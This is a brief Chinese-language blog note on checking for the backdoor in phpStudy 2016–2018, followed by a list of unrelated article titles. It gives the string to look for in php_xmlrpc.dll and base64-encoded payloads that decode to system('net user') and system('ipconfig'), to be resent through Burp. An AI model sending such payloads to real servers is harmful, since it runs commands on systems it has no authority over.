phpstudy2016-2018漏洞验证
2024-08-29 10:46:55
影响版本
漏洞验证
查看目录下 php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll存在@eval(%s('%s'));即说明有后门。
burp抓包 ctrl+R 重发
c3lzdGVtKCduZXQgdXNlcicpOw==为system('net user');的base64编码转换
可以通过转码查看
c3lzdGVtKCdpcGNvbmZpZycpOw== system(ipconfig);
最新文章
- 关于xamarin.forms在MVVM情况下如何DisplayActionSheet
- jQuery的13个优点
- SQL having 子句
- Codeforces Round #208 (Div. 2) B	 Dima and Text Messages
- Java基础毕向东day02
- MySQL 查看表结构简单命令。
- Hibernate之Session对象的相关方法以及持久化对象的状态
- SGU223 - Little Kings(状态压缩DP)
- STL——迭代器的概念
- 读<;<;如何阅读一本书>;>;乱七八糟的笔记1
- Socket 基础解析使用ServerSocket建立聊天服务器
- Codeforces 461B - Appleman and Tree 树状DP
- 关于Cocos2dx之JS创建项目
- CSS 弹性盒子布局
- C语言之循环次数
- 基础--Redis在Linux环境下的安装
- Webpack 4教程 - 第四部分,使用SplitChunksPlugin分离代码
- 遇到一个很古怪的问题,C++类static const成员的初始化
- python从sqlite中提取数据到excel
- windows下安装pytorch
热门文章
- python 登陆三次错误退出
- VIM 批量注释的两种方法 (转)
- ansible用authorized_key模块批量推送密钥到受控主机(免密登录)(ansible2.9.5)
- Windows(WSL2) Linux子系统搭建Docker环境
- Drone 安装教程
- 【Azure Redis 缓存 Azure Cache For Redis】如何设置让Azure Redis中的RDB文件暂留更久(如7天)
- 设备屏幕与Size Class对应
- 10 张图打开 CPU 缓存一致性的大门
- Redis学习笔记(八)——持久化
- 谈谈nginx和lvs各自的优缺点以及使用